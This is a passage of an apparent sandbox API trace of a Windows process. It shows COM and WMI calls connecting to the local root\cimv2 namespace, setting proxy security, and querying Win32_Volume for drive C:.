	[0258.492] CoGetClassObject (in: rclsid=0x556acc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae7cc | out: ppv=0x5fae7cc*=0x608da10) returned 0x0
	[0258.492] WbemLocator:IUnknown:QueryInterface (in: This=0x608da10, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae5fc | out: ppvObject=0x5fae5fc*=0x0) returned 0x80004002
	[0258.492] WbemLocator:IClassFactory:CreateInstance (in: This=0x608da10, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x6080bf0) returned 0x0
	[0258.492] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3d8 | out: ppvObject=0x5fae3d8*=0x6080bf0) returned 0x0
	[0258.537] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae394 | out: ppvObject=0x5fae394*=0x0) returned 0x80004002
	[0258.538] WbemLocator:IUnknown:AddRef (This=0x6080bf0) returned 0x3
	[0258.538] CoGetContextToken (in: pToken=0x5fae220 | out: pToken=0x5fae220) returned 0x0
	[0258.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae208 | out: ppvObject=0x5fae208*=0x0) returned 0x80004002
	[0258.538] CoGetContextToken (in: pToken=0x5fae218 | out: pToken=0x5fae218) returned 0x0
	[0258.538] WbemLocator:IUnknown:AddRef (This=0x6080bf0) returned 0x4
	[0258.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae28c | out: ppvObject=0x5fae28c*=0x0) returned 0x80004002
	[0258.538] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x3
	[0258.539] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x2
	[0258.539] WbemLocator:IUnknown:Release (This=0x608da10) returned 0x0
	[0258.539] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x1
	[0258.539] CoGetContextToken (in: pToken=0x5fae724 | out: pToken=0x5fae724) returned 0x0
	[0258.539] CoGetContextToken (in: pToken=0x5fae6e4 | out: pToken=0x5fae6e4) returned 0x0
	[0258.539] WbemLocator:IUnknown:AddRef (This=0x6080bf0) returned 0x2
	[0258.539] WbemLocator:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x5fae760*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae75c | out: ppvObject=0x5fae75c*=0x6080bf0) returned 0x0
	[0258.539] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x2
	[0258.539] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x1
	[0258.540] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5fae954 | out: puCount=0x5fae954*=0x2) returned 0x0
	[0258.540] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=8, puBuffLength=0x5fae950*=0x0, pszText=0x0 | out: puBuffLength=0x5fae950*=0x17, pszText=0x0) returned 0x0
	[0258.540] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=8, puBuffLength=0x5fae950*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae950*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.540] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5fae42c | out: ppv=0x5fae42c*=0x608d470) returned 0x0
	[0258.540] WbemLocator:IWbemLocator:ConnectServer (in: This=0x608d470, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5fae478 | out: ppNamespace=0x5fae478*=0x608de2c) returned 0x0
	[0258.650] WbemLocator:IUnknown:QueryInterface (in: This=0x608de2c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae348 | out: ppvObject=0x5fae348*=0x586d1c) returned 0x0
	[0258.650] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x586d1c, pProxy=0x608de2c, pAuthnSvc=0x5fae390, pAuthzSvc=0x5fae38c, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394, pImpLevel=0x5fae380, pAuthInfo=0x5fae384, pCapabilites=0x5fae388 | out: pAuthnSvc=0x5fae390*=0xa, pAuthzSvc=0x5fae38c*=0x0, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394*=0x6, pImpLevel=0x5fae380*=0x2, pAuthInfo=0x5fae384, pCapabilites=0x5fae388*=0x1) returned 0x0
	[0258.650] WbemLocator:IUnknown:Release (This=0x586d1c) returned 0x1
	[0258.650] WbemLocator:IUnknown:QueryInterface (in: This=0x608de2c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae33c | out: ppvObject=0x5fae33c*=0x586d3c) returned 0x0
	[0258.650] WbemLocator:IUnknown:QueryInterface (in: This=0x608de2c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae338 | out: ppvObject=0x5fae338*=0x586d1c) returned 0x0
	[0258.650] WbemLocator:IClientSecurity:SetBlanket (This=0x586d1c, pProxy=0x608de2c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.651] WbemLocator:IUnknown:Release (This=0x586d1c) returned 0x2
	[0258.651] WbemLocator:IUnknown:Release (This=0x586d3c) returned 0x1
	[0258.651] CoTaskMemFree (pv=0x586388) 
	[0258.651] WbemLocator:IUnknown:Release (This=0x608d470) returned 0x0
	[0258.651] WbemLocator:IUnknown:QueryInterface (in: This=0x608de2c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadcf8 | out: ppvObject=0x5fadcf8*=0x586d3c) returned 0x0
	[0258.651] WbemLocator:IUnknown:QueryInterface (in: This=0x586d3c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadcb4 | out: ppvObject=0x5fadcb4*=0x0) returned 0x80004002
	[0258.674] WbemLocator:IUnknown:QueryInterface (in: This=0x586d3c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x0) returned 0x80004002
	[0258.680] WbemLocator:IUnknown:AddRef (This=0x586d3c) returned 0x3
	[0258.680] CoGetContextToken (in: pToken=0x5fadb40 | out: pToken=0x5fadb40) returned 0x0
	[0258.680] WbemLocator:IUnknown:QueryInterface (in: This=0x586d3c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb28 | out: ppvObject=0x5fadb28*=0x586c9c) returned 0x0
	[0258.681] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x586c9c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadb30 | out: pCid=0x5fadb30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.681] WbemLocator:IUnknown:Release (This=0x586c9c) returned 0x3
	[0258.681] CoGetContextToken (in: pToken=0x5fadb38 | out: pToken=0x5fadb38) returned 0x0
	[0258.681] WbemLocator:IUnknown:AddRef (This=0x586d3c) returned 0x4
	[0258.681] WbemLocator:IUnknown:QueryInterface (in: This=0x586d3c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadbac | out: ppvObject=0x5fadbac*=0x586d24) returned 0x0
	[0258.681] WbemLocator:IUnknown:Release (This=0x586d3c) returned 0x4
	[0258.681] WbemLocator:IRpcOptions:Query (in: This=0x586d24, pPrx=0x586d3c, dwProperty=2, pdwValue=0x5fadbd0 | out: pdwValue=0x5fadbd0) returned 0x80004002
	[0258.681] WbemLocator:IUnknown:Release (This=0x586d24) returned 0x3
	[0258.681] WbemLocator:IUnknown:Release (This=0x586d3c) returned 0x2
	[0258.681] CoGetContextToken (in: pToken=0x5fadfac | out: pToken=0x5fadfac) returned 0x0
	[0258.682] CoGetContextToken (in: pToken=0x5fadf6c | out: pToken=0x5fadf6c) returned 0x0
	[0258.682] WbemLocator:IUnknown:AddRef (This=0x586d3c) returned 0x3
	[0258.682] WbemLocator:IUnknown:QueryInterface (in: This=0x586d3c, riid=0x5fadfe8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fadfe4 | out: ppvObject=0x5fadfe4*=0x608de2c) returned 0x0
	[0258.682] WbemLocator:IUnknown:Release (This=0x586d3c) returned 0x3
	[0258.682] WbemLocator:IUnknown:Release (This=0x608de2c) returned 0x2
	[0258.682] WbemLocator:IUnknown:Release (This=0x608de2c) returned 0x1
	[0258.682] CoGetContextToken (in: pToken=0x5fae8c8 | out: pToken=0x5fae8c8) returned 0x0
	[0258.682] WbemLocator:IUnknown:AddRef (This=0x586d3c) returned 0x2
	[0258.682] WbemLocator:IUnknown:QueryInterface (in: This=0x586d3c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae4ec | out: ppvObject=0x5fae4ec*=0x586d3c) returned 0x0
	[0258.682] WbemLocator:IUnknown:Release (This=0x586d3c) returned 0x2
	[0258.683] WbemLocator:IUnknown:Release (This=0x586d3c) returned 0x1
	[0258.683] CoGetContextToken (in: pToken=0x5fae0cc | out: pToken=0x5fae0cc) returned 0x0
	[0258.683] CoGetContextToken (in: pToken=0x5fae08c | out: pToken=0x5fae08c) returned 0x0
	[0258.683] WbemLocator:IUnknown:AddRef (This=0x586d3c) returned 0x2
	[0258.683] WbemLocator:IUnknown:QueryInterface (in: This=0x586d3c, riid=0x5fae108*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fae104 | out: ppvObject=0x5fae104*=0x608de2c) returned 0x0
	[0258.683] WbemLocator:IUnknown:Release (This=0x586d3c) returned 0x2
	[0258.683] WbemLocator:IUnknown:AddRef (This=0x608de2c) returned 0x3
	[0258.683] IWbemServices:ExecQuery (in: This=0x608de2c, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x5fae710 | out: ppEnum=0x5fae710*=0x608cb34) returned 0x0
	[0258.688] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3bc | out: ppvObject=0x5fae3bc*=0x608cb38) returned 0x0
	[0258.688] IClientSecurity:QueryBlanket (in: This=0x608cb38, pProxy=0x608cb34, pAuthnSvc=0x5fae404, pAuthzSvc=0x5fae400, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408, pImpLevel=0x5fae3f4, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc | out: pAuthnSvc=0x5fae404*=0xa, pAuthzSvc=0x5fae400*=0x0, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408*=0x6, pImpLevel=0x5fae3f4*=0x2, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc*=0x1) returned 0x0
	[0258.688] IUnknown:Release (This=0x608cb38) returned 0x1
	[0258.688] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3b0 | out: ppvObject=0x5fae3b0*=0x586c4c) returned 0x0
	[0258.688] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3ac | out: ppvObject=0x5fae3ac*=0x608cb38) returned 0x0
	[0258.689] IClientSecurity:SetBlanket (This=0x608cb38, pProxy=0x608cb34, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.695] IUnknown:Release (This=0x608cb38) returned 0x2
	[0258.695] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x1
	[0258.695] CoTaskMemFree (pv=0x5863b8) 
	[0258.695] WbemLocator:IUnknown:Release (This=0x608de2c) returned 0x2
	[0258.695] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd68 | out: ppvObject=0x5fadd68*=0x586c4c) returned 0x0
	[0258.696] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd24 | out: ppvObject=0x5fadd24*=0x0) returned 0x80004002
	[0258.711] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc18 | out: ppvObject=0x5fadc18*=0x0) returned 0x80004002
	[0258.717] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x3
	[0258.717] CoGetContextToken (in: pToken=0x5fadbb0 | out: pToken=0x5fadbb0) returned 0x0
	[0258.717] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb98 | out: ppvObject=0x5fadb98*=0x586bac) returned 0x0
	[0258.717] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x586bac, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadba0 | out: pCid=0x5fadba0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.717] WbemLocator:IUnknown:Release (This=0x586bac) returned 0x3
	[0258.717] CoGetContextToken (in: pToken=0x5fadba8 | out: pToken=0x5fadba8) returned 0x0
	[0258.717] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x4
	[0258.717] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc1c | out: ppvObject=0x5fadc1c*=0x586c34) returned 0x0
	[0258.718] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x4
	[0258.718] WbemLocator:IRpcOptions:Query (in: This=0x586c34, pPrx=0x586c4c, dwProperty=2, pdwValue=0x5fadc40 | out: pdwValue=0x5fadc40) returned 0x80004002
	[0258.718] WbemLocator:IUnknown:Release (This=0x586c34) returned 0x3
	[0258.718] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x2
	[0258.718] CoGetContextToken (in: pToken=0x5fae01c | out: pToken=0x5fae01c) returned 0x0
	[0258.718] CoGetContextToken (in: pToken=0x5fadfdc | out: pToken=0x5fadfdc) returned 0x0
	[0258.718] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x3
	[0258.718] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x5fae058*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae054 | out: ppvObject=0x5fae054*=0x608cb34) returned 0x0
	[0258.718] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x3
	[0258.718] IUnknown:Release (This=0x608cb34) returned 0x2
	[0258.718] IUnknown:Release (This=0x608cb34) returned 0x1
	[0258.719] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5fae9a8 | out: puCount=0x5fae9a8*=0x2) returned 0x0
	[0258.719] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5fae9a4*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9a4*=0x17, pszText=0x0) returned 0x0
	[0258.719] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5fae9a4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9a4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.719] CoGetContextToken (in: pToken=0x5fae344 | out: pToken=0x5fae344) returned 0x0
	[0258.719] CoGetContextToken (in: pToken=0x5fae304 | out: pToken=0x5fae304) returned 0x0
	[0258.719] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x2
	[0258.719] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x5fae380*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae37c | out: ppvObject=0x5fae37c*=0x608cb34) returned 0x0
	[0258.719] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x2
	[0258.719] IUnknown:AddRef (This=0x608cb34) returned 0x3
	[0258.719] IEnumWbemClassObject:Clone (in: This=0x608cb34, ppEnum=0x5fae978 | out: ppEnum=0x5fae978*=0x608decc) returned 0x0
	[0258.722] IUnknown:QueryInterface (in: This=0x608decc, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x608ded0) returned 0x0
	[0258.722] IClientSecurity:QueryBlanket (in: This=0x608ded0, pProxy=0x608decc, pAuthnSvc=0x5fae67c, pAuthzSvc=0x5fae678, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680, pImpLevel=0x5fae66c, pAuthInfo=0x5fae670, pCapabilites=0x5fae674 | out: pAuthnSvc=0x5fae67c*=0xa, pAuthzSvc=0x5fae678*=0x0, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680*=0x6, pImpLevel=0x5fae66c*=0x2, pAuthInfo=0x5fae670, pCapabilites=0x5fae674*=0x1) returned 0x0
	[0258.722] IUnknown:Release (This=0x608ded0) returned 0x1
	[0258.722] IUnknown:QueryInterface (in: This=0x608decc, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae628 | out: ppvObject=0x5fae628*=0x586f1c) returned 0x0
	[0258.722] IUnknown:QueryInterface (in: This=0x608decc, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae624 | out: ppvObject=0x5fae624*=0x608ded0) returned 0x0
	[0258.722] IClientSecurity:SetBlanket (This=0x608ded0, pProxy=0x608decc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.725] IUnknown:Release (This=0x608ded0) returned 0x2
	[0258.725] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x1
	[0258.725] CoTaskMemFree (pv=0x586388) 
	[0258.726] IUnknown:Release (This=0x608cb34) returned 0x2
	[0258.726] IUnknown:QueryInterface (in: This=0x608decc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfd0 | out: ppvObject=0x5fadfd0*=0x586f1c) returned 0x0
	[0258.726] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadf8c | out: ppvObject=0x5fadf8c*=0x0) returned 0x80004002
	[0258.727] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fade80 | out: ppvObject=0x5fade80*=0x0) returned 0x80004002
	[0258.730] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x3
	[0258.730] CoGetContextToken (in: pToken=0x5fade18 | out: pToken=0x5fade18) returned 0x0
	[0258.731] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade00 | out: ppvObject=0x5fade00*=0x586e7c) returned 0x0
	[0258.731] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x586e7c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fade08 | out: pCid=0x5fade08*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.731] WbemLocator:IUnknown:Release (This=0x586e7c) returned 0x3
	[0258.731] CoGetContextToken (in: pToken=0x5fade10 | out: pToken=0x5fade10) returned 0x0
	[0258.731] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x4
	[0258.731] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade84 | out: ppvObject=0x5fade84*=0x586f04) returned 0x0
	[0258.731] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x4
	[0258.731] WbemLocator:IRpcOptions:Query (in: This=0x586f04, pPrx=0x586f1c, dwProperty=2, pdwValue=0x5fadea8 | out: pdwValue=0x5fadea8) returned 0x80004002
	[0258.731] WbemLocator:IUnknown:Release (This=0x586f04) returned 0x3
	[0258.731] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x2
	[0258.732] CoGetContextToken (in: pToken=0x5fae284 | out: pToken=0x5fae284) returned 0x0
	[0258.732] CoGetContextToken (in: pToken=0x5fae244 | out: pToken=0x5fae244) returned 0x0
	[0258.732] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x3
	[0258.732] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x5fae2c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae2bc | out: ppvObject=0x5fae2bc*=0x608decc) returned 0x0
	[0258.732] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x3
	[0258.732] IUnknown:Release (This=0x608decc) returned 0x2
	[0258.732] IUnknown:Release (This=0x608decc) returned 0x1
	[0258.732] CoGetContextToken (in: pToken=0x5fae878 | out: pToken=0x5fae878) returned 0x0
	[0258.732] CoGetContextToken (in: pToken=0x5fae838 | out: pToken=0x5fae838) returned 0x0
	[0258.732] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x2
